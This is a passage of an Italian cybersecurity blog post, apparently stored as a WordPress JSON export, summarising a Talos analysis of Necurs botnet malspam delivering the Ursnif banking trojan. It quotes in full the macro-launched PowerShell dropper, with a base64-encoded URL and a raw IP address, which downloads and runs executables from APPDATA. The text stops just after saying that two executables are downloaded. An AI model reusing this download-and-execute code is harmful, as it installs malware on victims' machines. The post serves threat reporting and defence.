{"id":56,"date":"2018-07-11T13:42:08","date_gmt":"2018-07-11T12:42:08","guid":{"rendered":"http:\/\/fortgale.com\/news\/?p=56"},"modified":"2018-07-11T13:42:08","modified_gmt":"2018-07-11T12:42:08","slug":"necurs-botnet","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/cyber-security-news\/necurs-botnet\/","title":{"rendered":"Necurs Botnet & Trojan Bancari"},"content":{"rendered":"

Il Team di Cisco Talos ha condiviso l’analisi della nuova ondata Malspam della Botnet Necurs (link<\/a>).<\/p>\n

Quest’ultima \u00e8 sicuramente fra le botnet pi\u00f9 attive al mondo, in grado di generare\u00a0enormi quantit\u00e0 di Spam. Le mail malevole inviate contengono Ransomware e Trojan Bancari (Ursnif, Panda Banker o Emotet).<\/p>\n

L’apertura del documento malevolo e la conseguente abilitazione del contenuto (abilitazione della Macro), avvia il processo di compromissione del sistema.<\/p>\n

Di seguito una breve analisi del Malware bancario Ursnif:<\/p>\n

\"\"
\nL’allegato malevolo risulta essere un file doc dal nome: [NOMEAZIENDA]_Richiesta – [Cognome dipendente].doc<\/p>\n

L’apertura del file e l’abilitazione dei contenuti permette\u00a0 l’avvio del codice malevolo, in particolare \u00e8 avviato un comando Powershell con i parametri:<\/p>\n

$VeZynUhagoWemyROVeJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(“aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAvAGIAcgBlAGUAcABpAHQAYQBsADIANwAvAHkAeQB5AGoALgBnAGUAcgA\/AHYAYQBzAHkAZwBhAHIAdQBiAD0AdwBpAHoAYQBoAG8AegBlACYAYQBhAG4AaQB4AG8AaAB1AD0AawB1AGsAJgByAGEAdABhAHgAPQBoAHkAaQB1AHMAaQBwAHUAaQBhACYAcABvAGMAYQB4AGUAbQBvAGsAPQB6AHUAJgByAGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA=”));(New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, $env:APPDATA + ‘\\valabyhuh.exe’); Start-Process $env:APPDATA’\\valabyhuh.exe’;Write-Host “bAbYgiramOpEPY”;$iARAPUmOPaJeS = New-Object System.Net.NetworkCredentia<\/p>\n

l(“lUpIaaKAXuqexOGybu”,”lUpIaaKAXuqexOGybu”).SecurePassword;(New-Object System.Net.WebClient).DownloadFile(‘http:\/\/91.210.104.247\/porn.jpg’, $env:APPDATA + ‘\\stat.exe’); Write-Host “FYFopIsYpUjurof”;Start-Process $env:APPDATA’\\stat.exe’;$jOCOdeFOLUXALoNA = “nuqoLuSAwEjOdE”,”iiQOCOhERiJYsyie”,”qIhyGAtYlebimycuaUf”,”bYtURYGunUtiKe”,”pazuWeXOQoFIzIQUaUhe”;Exit;<\/p><\/blockquote>\n

Il codice eseguito avvia il download di\u00a02 file eseguibili:<\/p>\n